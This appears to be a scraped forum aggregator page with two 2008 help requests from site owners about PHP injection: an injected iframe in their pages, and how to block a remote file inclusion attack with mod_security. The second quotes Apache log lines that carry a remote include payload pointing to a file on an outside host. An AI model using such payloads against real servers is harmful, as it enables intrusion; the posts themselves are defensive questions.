PHP Inject

Feb 1, 2008

Today i see all sites index i open , if i see code font, have line:

<iframe src="[url]

I see files no edited in hoster.

This cause error in exec scripts php.

What solution? What problem?

Is injection?

View 8 Replies


ADVERTISEMENT

Anybody Know How To Block This Specific PHP Inject Attack Using Mod_Security

Jun 17, 2008

how to block the following "WEB-PHP remote include path" attack using mod_security.

I have tried using Default Mod_Securty and also Mod_security from [url]

But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server.

The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.

=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....

View 1 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved